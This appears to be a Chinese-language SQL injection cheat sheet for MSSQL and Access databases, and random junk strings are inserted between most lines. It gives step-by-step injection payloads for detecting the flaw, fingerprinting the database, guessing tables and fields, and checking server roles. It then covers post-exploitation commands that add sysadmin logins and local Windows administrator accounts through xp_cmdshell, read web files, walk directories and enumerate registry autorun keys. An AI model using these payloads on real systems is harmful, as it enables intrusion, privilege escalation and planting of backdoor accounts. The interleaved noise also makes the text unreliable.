1.判断是否有注入;and 1=1 ;and 1=2 @gTpiV2
2.初步判断是否是mssql ;and user>0 N;ssO,
Ujw^j
3.注入参数是字符'and [查询条件] and ''=' W'6*$Ron
Oys.8%+ P
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 4; j#7
9K)OQDv%6D
5.判断数据库系统 }3vB_0[r
'g ,Oi1|~
;and (select count(*) from sysobjects)>0 mssql (*hA0&n
Y`c\{&M6
;and (select count(*) from msysobjects)>0 access kQ4%J,7e4
6 !+"7r6
.8wR;^
N8m^h:b
6.猜数据库 ;and (select Count(*) from [数据库名])>0 a0AIq44
~LkReQI
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 E9
q8tE}
~1}NQa(
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 q9!5J2P
8mx5K-/,y^
9.(1)猜字段的ascii值(access) '+-R 7#
v<;,x
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 S0"OU0`N
?#]c{Tlpz
(2)猜字段的ascii值(mssql) %L~X\M:Qk
!fz`O>-mZ
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 x)V.^-
/$ L;m
10.测试权限结构(mssql) #JTi]U6`
Sgr<z d'b
\@I.K+hj$
e2Xx7*vS
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 12cfqIo9
KF7f<
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- WhK?>u
]4hXK!^Uu
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 36lIV,YnU
'8%aq8
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- cL=P((<K?
8l)l9;4 6
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- |5g*pXu{
n>iPAD
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- #=$4U!yL
sU{+.k{
;and 1=(select IS_MEMBER('db_owner'));-- c~c3;
v[lytX4)
q^12Rj;H
v~@Y_`l
11.添加mssql和系统的帐户 L.|GC7$0
$SXF>n{}
;exec master.dbo.sp_addlogin username;-- 85s{;3
;exec master.dbo.sp_password null,username,password;-- A"9aEOX-?i
Ppx*
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- w.0.||C
O
vTB*J,6.
;exec master.dbo.xp_cmdshell 'net user username password rj{'X /
)8 iDjNM<
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- m]u#Dm7h
^,`Lt *
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 4+ 4?0R
XK&#K? M
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- t?c*(?Xa
iPkG=*Ip(%
U&B~GJT+
J(l6(+8
12.(1)遍历目录 xds"n5
s)To#
;create table dirs(paths varchar(100), id int) !`aodz*PO
^_<pc|1
;insert dirs exec master.dbo.xp_dirtree 'c:\' DO%YOv
tB1Qr**
;and (select top 1 paths from dirs)>0
2QBtwlQ?[
-(1e!5_-@
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 525xm"Bs
-<<!eH
Z:n33xh=<
E8-p
,e,
(2)遍历目录 6=H-H\iw
)s^XVs.-
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 5-&P4
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 Q!|71{5U
+SP5+"y@
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 * }2o
\h6Q
S)[2\Z{**T
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ~S=hxKI
X0=R
@_KY
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 i:zA(
gr-%9=Uq
PH=wPft
t8^*s<O
13.mssql中的存储过程 m<076O4|`
o-(jSaH :;
xp_regenumvalues 注册表根键, 子键 z?i82B[Tm
nF//y}
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 JE?XZp@V
\tQi7yj4
xp_regread 根键,子键,键值名 "iKK&%W
0\i&